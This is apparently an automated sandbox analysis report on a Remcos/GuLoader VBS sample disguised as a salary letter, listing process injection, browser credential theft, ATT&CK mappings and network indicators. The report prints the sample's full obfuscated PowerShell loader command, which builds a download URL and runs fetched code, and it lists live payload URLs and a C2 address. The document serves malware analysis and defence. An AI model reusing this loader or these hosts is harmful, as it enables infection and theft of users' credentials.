              Source: powershell.exe, 00000002.00000002.2331664517.000001ACFDCDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | API call chain: ExitProcess graph end node (graph_13-34025)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort
              Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_06F780E0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_22322639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_22324AB4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_2232724E GetProcessHeap
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_22322B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_223260E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
              Source: Yara match | File source: amsi64_948.amsi.csv, type: OTHER
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 948, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4900, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. 
Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyGJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bacgpbljvxtooetxcadtvibkg"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ownrimoexwdxbqdncvlwjzqsqkiyhshe"
              Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe"
              Source: msiexec.exe, 00000007.00000003.2800084226.0000000006A5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3461141121.0000000006A5A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager'
              Source: msiexec.exe, 00000007.00000002.3461141121.0000000006A5A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerC
              Source: msiexec.exe, 00000007.00000003.2800084226.0000000006A5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3461141121.0000000006A5A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager"
              Source: msiexec.exe, 00000007.00000002.3461141121.0000000006A5A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerp
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2800084226.0000000006A5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_22322933 cpuid
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_22322264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0041739B GetVersionExW
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match | File source: 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 3976, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
              Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
              Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: ESMTPPassword 13_2_004033F0
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword 13_2_00402DB3
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword 13_2_00402DB3
              Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 6672, type: MEMORYSTR

              Remote Access Functionality

              Source: C:\Windows\SysWOW64\msiexec.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-KC5V8F
              Source: Yara match | File source: 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 3976, type: MEMORYSTR
              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
              Resource Development: 321 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
              Execution: 11 Windows Management Instrumentation; 11 Native API; 1 Exploitation for Client Execution; 22 Command and Scripting Interpreter; 2 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
              Persistence: 321 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
              Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 412 Process Injection; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
              Defense Evasion: 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 412 Process Injection; HTML Smuggling
              Credential Access: 1 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
              Discovery: 1 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 28 System Information Discovery; 141 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 4 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
              Collection: 1 Archive Collected Data; 1 Data from Local System; 2 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
              Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 2 Non-Application Layer Protocol; 112 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
              [Behavior graph: Behavior Graph ID: 1530593, Sample: Salary Increase Letter_Oct ..., Startdate: 10/10/2024, Architecture: WINDOWS, Score: 100]

              Source | Detection | Scanner | Label | Link
              Salary Increase Letter_Oct 2024.vbs | 11% | ReversingLabs | |
              Salary Increase Letter_Oct 2024.vbs | 8% | Virustotal | | Browse
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label
              http://www.imvu.comr | 0% | URL Reputation | safe
              https://contoso.com/License | 0% | URL Reputation | safe
              https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
              https://aka.ms/pscore6lB | 0% | URL Reputation | safe
              https://contoso.com/ | 0% | URL Reputation | safe
              https://nuget.org/nuget.exe | 0% | URL Reputation | safe
              https://login.yahoo.com/config/login | 0% | URL Reputation | safe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
              http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
              http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
              https://go.micro | 0% | URL Reputation | safe
              http://www.imvu.com | 0% | URL Reputation | safe
              https://contoso.com/Icon | 0% | URL Reputation | safe
              http://geoplugin.net/json.gp | 0% | URL Reputation | safe
              https://aka.ms/pscore68 | 0% | URL Reputation | safe
              http://www.ebuddy.com | 0% | URL Reputation | safe
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              geoplugin.net | 178.237.33.50 | true | false | | unknown
              ln6b9.shop | 104.21.2.6 | true | false | | unknown

              Name | Malicious | Antivirus Detection | Reputation
              http://ln6b9.shop/IBodHWPw/Kokkerering.ocx | false | | unknown
              http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.bin | false | | unknown
              http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
              154.216.17.14 | true | | unknown
              IP | Domain | Country | ASN | ASN Name | Malicious
              154.216.17.14 | unknown | Seychelles | 135357 | SKHT-ASShenzhenKatherineHengTechnologyInformationCo | true
              178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
              104.21.2.6 | ln6b9.shop | United States | 13335 | CLOUDFLARENETUS | false
              Joe Sandbox version: 41.0.0 Charoite
              Analysis ID: 1530593
              Start date and time: 2024-10-10 09:26:21 +02:00
              Joe Sandbox product: CloudBasic
              Overall analysis duration: 0h 8m 24s
              Hypervisor based Inspection enabled: false
              Report type: full
              Cookbook file name: default.jbs
              Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed: 15
              Number of new started drivers analysed: 0
              Number of existing processes analysed: 0
              Number of existing drivers analysed: 0
              Number of injected processes analysed: 0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode: default
              Analysis stop reason: Timeout
              Sample name: Salary Increase Letter_Oct 2024.vbs
              Detection: MAL
              Classification: mal100.troj.spyw.expl.evad.winVBS@18/10@2/3
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 66.7%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 97%
                                                                                    • Number of executed functions: 141
                                                                                    • Number of non-executed functions: 324
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .vbs
                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 4900 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 948 because it is empty
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              Time | Type | Description
              03:27:21 | API Interceptor | 87x Sleep call for process: powershell.exe modified
              03:28:34 | API Interceptor | 498081x Sleep call for process: msiexec.exe modified
              Match | Associated Sample Name / URL | Detection | Threat Name | Context
              154.216.17.14 | Salary Increase Letter_Oct 2024.vbs | malicious | Remcos, GuLoader |
              178.237.33.50 | PO-95958694495545.xls | malicious | Remcos | geoplugin.net/json.gp
              178.237.33.50 | DHL AWB DOCS- 9284730932.exe | malicious | Remcos | geoplugin.net/json.gp
              178.237.33.50 | MV STARSHIP AQUILA_pdf.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
              178.237.33.50 | 1728486965f09c65efe9ac8095b3334d8c21391956afcf95821ee79f205e6ccc5199206ffd610.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
              178.237.33.50 | n92fR6j8tl.rtf | malicious | Remcos | geoplugin.net/json.gp
              178.237.33.50 | P04562345.bat.exe | malicious | Remcos | geoplugin.net/json.gp
              178.237.33.50 | SWIFT 103 202410071251443120 071024-pdf.vbs | malicious | Remcos | geoplugin.net/json.gp
              178.237.33.50 | nL0Vxav3OB.exe | malicious | Remcos | geoplugin.net/json.gp
              178.237.33.50 | 6yfpZrVWQI.exe | malicious | Remcos | geoplugin.net/json.gp
              178.237.33.50 | xQOrkxePXD.exe | malicious | Remcos | geoplugin.net/json.gp
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      ln6b9.shopUnincriminated.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                      • 172.67.128.117
                                                                                      cJX8BV8LYG.exeGet hashmaliciousAzorultBrowse
                                                                                      • 172.67.128.117
                                                                                      4QihT6CwD8.exeGet hashmaliciousAzorultBrowse
                                                                                      • 104.21.2.6
                                                                                      Po#70831.exeGet hashmaliciousAzorultBrowse
                                                                                      • 172.67.128.117
                                                                                      geoplugin.netPO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      DHL AWB DOCS- 9284730932.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      MV STARSHIP AQUILA_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 178.237.33.50
                                                                                      1728486965f09c65efe9ac8095b3334d8c21391956afcf95821ee79f205e6ccc5199206ffd610.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      n92fR6j8tl.rtfGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      P04562345.bat.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      SWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      6yfpZrVWQI.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      xQOrkxePXD.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      ATOM86-ASATOM86NLPO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      DHL AWB DOCS- 9284730932.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      MV STARSHIP AQUILA_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 178.237.33.50
                                                                                      1728486965f09c65efe9ac8095b3334d8c21391956afcf95821ee79f205e6ccc5199206ffd610.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      n92fR6j8tl.rtfGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      P04562345.bat.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      SWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      6yfpZrVWQI.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      xQOrkxePXD.exeGet hashmaliciousRemcosBrowse
                                                                                      • 178.237.33.50
                                                                                      CLOUDFLARENETUSLogistics1.vbsGet hashmaliciousFormBookBrowse
                                                                                      • 188.114.96.3
                                                                                      Quarantined Messages(11).zipGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.17.25.14
                                                                                      https://w7950.app.blinkops.com/Get hashmaliciousUnknownBrowse
                                                                                      • 104.16.117.116
                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.53.8
                                                                                      PO-95958694495545.xlsGet hashmaliciousRemcosBrowse
                                                                                      • 188.114.96.3
                                                                                      zYlQoif21X.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                                                                                      • 172.67.206.204
                                                                                      MV STARSHIP AQUILA_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 104.21.56.207
                                                                                      Rechnung0192839182.pdfGet hashmaliciousUnknownBrowse
                                                                                      • 172.66.0.227
                                                                                      4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                                                                                      • 172.67.74.152
                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.53.8
                                                                                      SKHT-ASShenzhenKatherineHengTechnologyInformationCoMV STARSHIP AQUILA_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 154.216.18.214
                                                                                      4W5Y34sRmd.exeGet hashmaliciousAsyncRATBrowse
                                                                                      • 154.216.17.207
                                                                                      P04562345.bat.exeGet hashmaliciousRemcosBrowse
                                                                                      • 154.216.17.185
                                                                                      2LgQzImW3E.elfGet hashmaliciousMiraiBrowse
                                                                                      • 156.241.11.62
                                                                                      nullnet_load.arm.elfGet hashmaliciousMiraiBrowse
                                                                                      • 156.230.19.131
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • 154.216.18.3
                                                                                      na.elfGet hashmaliciousUnknownBrowse
                                                                                      • 156.226.9.190
                                                                                      na.rtfGet hashmaliciousUnknownBrowse
                                                                                      • 154.216.19.160
                                                                                      Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 154.216.17.14
                                                                                      September Report 24'.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 154.216.18.214
                                                                                      No context
                                                                                      No context
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:Unknown
                                                                                      Category:dropped
                                                                                      Size (bytes):962
                                                                                      Entropy (8bit):5.013811273052389
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                      MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                                                      SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                                                      SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                                                      SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                                                      Malicious:false
